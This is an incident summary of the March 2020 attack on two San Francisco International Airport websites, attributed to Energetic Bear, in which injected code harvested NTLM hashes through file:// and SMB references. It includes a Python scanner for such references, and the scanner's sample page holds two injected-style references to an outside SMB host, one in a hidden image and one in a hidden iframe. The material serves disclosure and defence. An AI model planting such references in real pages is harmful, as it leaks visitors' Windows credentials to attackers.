
Cyber Incident Victim: San Francisco International Airport

Date: Mar 2020

Location: United States of America

Summary

San Francisco International Airport experienced a cyberattack targeting two employee and contractor websites, where hackers injected malicious code that exploited an Internet Explorer vulnerability to harvest visitors' Windows login credentials in the form of NTLM hashes. The incident was attributed to the Russian state-sponsored group Energetic Bear, known for expanding from energy sector attacks to aviation, which used established tactics such as abusing an SMB feature and file:// prefixes to capture credentials that could facilitate lateral network movement for reconnaissance or sabotage. The airport mitigated the risk by resetting all employee passwords and advising affected users to change their Windows credentials; no evidence suggested a broader compromise beyond the initial breach.


Description

In March 2020, San Francisco International Airport experienced a cybersecurity incident involving the compromise of two websites: SFOConnect.com, used by airport employees, and SFOConstruction.com, a portal for construction contractors. Attackers breached both sites and inserted malicious code designed to exploit an Internet Explorer vulnerability, specifically targeting visitors' Windows credentials through the theft of NTLM hashes. These hashes, if cracked, could reveal users' Windows passwords, potentially enabling unauthorized access to the airport's internal network. The attack methodology relied on an SMB feature and the file:// prefix: a reference to a file:// resource on an attacker-controlled host causes Windows to attempt an SMB connection and offer the user's NTLM credentials automatically, a technique previously documented in watering hole campaigns.

Security firm ESET attributed the activity to Energetic Bear (also known as DragonFly), a Russian state-sponsored hacking group active since 2010. The group had historically targeted energy sector organizations but expanded operations to include aviation infrastructure in this incident. ESET researcher Matthieu Faou confirmed that the tactics aligned with Energetic Bear's known patterns, including the use of compromised websites to distribute credential-stealing payloads. While the attackers successfully exfiltrated NTLM hashes, there was no evidence that they progressed beyond credential theft to lateral movement or data exfiltration within the airport's network.
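Injected file:// and UNC (\\host\share) references of the kind described above can be caught by scanning a site's HTML for resource attributes that resolve to a remote SMB host. The following scanner is an added example, not code from this record or from the airport's systems; the sample page and the address 203.0.113.7 in it are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes IE resolves as resource locations: a file:// or \\host\share value
# makes Windows open an SMB session to that host and offer NTLM authentication.
URL_ATTRS = {"src", "href", "action", "data", "background"}
UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")  # \\host\share or \\host/share


def smb_host(ref: str):
    """Return the remote host a reference would be fetched from over SMB, else None."""
    ref = ref.strip()
    m = UNC_RE.match(ref)
    if m:
        return m.group(1).lower()
    if ref.lower().startswith("file:"):
        # file:///C:/... has an empty netloc and stays local, so it is not flagged
        return urlparse(ref).netloc.lower() or None
    return None


class FileRefScanner(HTMLParser):
    """Collects (tag, attribute, host) for every SMB-resolving reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                host = smb_host(value)
                if host:
                    self.findings.append((tag, name, host))


def scan_html(html: str):
    scanner = FileRefScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample: one legitimate image and link, plus two injected references
# to 203.0.113.7 (a documentation-reserved address, not a real host).
SAMPLE_PAGE = """<html><body>
<img src="/images/logo.png"><a href="https://portal.example/login">Sign in</a>
<img src="file://203.0.113.7/share/pixel.gif" width="1" height="1">
<iframe src="\\\\203.0.113.7\\c$\\x.html" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host in scan_html(SAMPLE_PAGE):
        print(f"suspicious <{tag} {attr}> resolving to SMB host {host}")
```

Running the scanner over published pages on a schedule flags this class of injection early; blocking outbound TCP 445 at the network edge stops the credential leak even when a page is missed.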


The airport publicly disclosed the breach via a data breach notification and initiated password resets for all employee accounts as a containment measure. Affected users were advised to reset their Windows passwords to invalidate any potentially compromised credentials. This action mitigated the risk posed by stolen NTLM hashes, since a password change renders previously captured hashes unusable.

ESET noted no corroborating evidence of similar attacks against other airports at the time, though the group had previously compromised media websites in Eastern Europe using identical techniques. Energetic Bear's targeting of critical infrastructure entities underscored the persistent threat posed by state-sponsored actors to transportation and energy sectors globally. The incident highlighted the operational risks of web-based services in organizational ecosystems, particularly when vulnerabilities in legacy browsers like Internet Explorer remain unpatched. San Francisco International Airport's response focused on credential rotation and public transparency, with no reported disruptions to flight operations or additional downstream impacts from the breach.
